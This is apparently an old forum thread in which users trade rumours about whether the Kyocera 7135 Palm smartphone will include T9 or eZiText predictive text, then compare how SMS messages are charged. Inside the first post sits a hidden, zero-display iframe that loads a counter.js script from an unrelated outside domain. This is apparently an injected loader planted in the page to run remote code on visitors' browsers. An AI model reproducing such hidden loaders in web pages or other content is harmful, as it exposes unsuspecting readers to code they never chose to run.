As I understand it the 7135 is supposed to have Predictive text and I have read here that its supposed to be T9 - So I did a litttle digging and found the Kyocera actually has a predictive text agreement with Zi Corp for their eZiText technology--
-- This was dated for May of 2000 and I have no idea of whether the 7135 will use T9 or eZiText or none at all, however I thought it was interesting enough to post here for those who have never used predictive text before-- it has an online interactive demo you can try it out as well.
Of course--who needs predictive text if you have a keyboard, silkyboard or are just plain gooood at graffiti.
(Please no fights about which input method is better- to each his/her own.)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The current "word on the street" is that the 7135 will NOT come with predictive text preinstalled.
It would seem to me that predictive text would be desirable regardless of the input method. After all, the fewer keystrokes or stylus taps the better...right?
Check out the video mentioned on that thread- Maybe the guy got confused with another phone, but maybe there's still hope. I believe some of the testers so far dont have predictive text, which could just vary by firmware updates- Also the 5135 spec page states "predictive text" so I kinda find it hard to believe that Kyocera would NOT put the technology into its top of the line model 7135- that'd be like ford not putting air conditioning into a Lincoln.
Who knows though -- this being a palm device with its graffiti pad, maybe they figured it wouldn't be worth the effort. If they are trying to compete with the treo-thumboarders, RIM's & not to mention other cell phone devices with T9, it would sure help them out a lot to put it on there.
I'm sure some clever Palm programmer will figure out a way to do it even if its not included, I just think it would be better if it was integrated by the manufactuers for stability & support. (Not to mention the dictionary for such a predictive input software would be better placed on the ROM, leaving only the custom words to take up space in the RAM.)
I use a phone that does not have predictive text, so I am eagerly awaiting a 7135 with graffiti-- predicitve text would be a bonus for those one handed moments, like driving, carrying things, or pushing a shopping cart.
Guys,
Bad news. While the original beta's had T9 and the final product WAS supposed to have it, there were too many compatability problems and the word is that contrary to initial plans, the 7135 will not have T9.
That makes me very sad. But I agree, wouldn't it be great if there were a 3rd party app available?
I wouldn't want it if it stayed resident, using system resources, but wouldn't complain if there was a switch to turn it off. Like say they include it in some software refresh down the road, it would be nice to try it out, but also nice to be able to turn it off if one felt it didn't increase productivity.
Speaking of SMS - I was wondering, on a 6035 does the SMS app, send the message through a data call or directly though networksome how?
I am curious of how they are charged- on my cell i have a plan which allows me to receive 100 in a month (however my phone is not 2-way but does have a WAP browser so I get by by logining in to it and sending replies that way-- which only chews up minutes in my plan instead of being counted as an additonal charge. Got any insight for me Rob? anyone else? Thanks

You know, I don't think a SMS counts as either data or voice.... but I'm not sure. I think it's a separate function myself. I'm sure somebody here will know for sure.

I think it count as something else, like a service similar to voice mail. I remembered when voice mail would have a limit, and going over the limit makes you pay per voice mail. Now my plan doesn't include the sms, so everytime I receive an sms, they charge me something like $.02 for the message, and if I want to send one, it'll cost me $.10. I tried it once and looked at my phone bill. Doesn't indicate on the timeframe, but did include on the bill that I had 5 incoming sms and 1 outgoing sms. I think it went over your regular minutes, but credit back to you, kinda like calling their toll free tech support number.
as for text messaging for normal phones-- my sister's Nokia cost her 20 bucks just for SMSing on her first bill - she learned quickly to use it when needed!
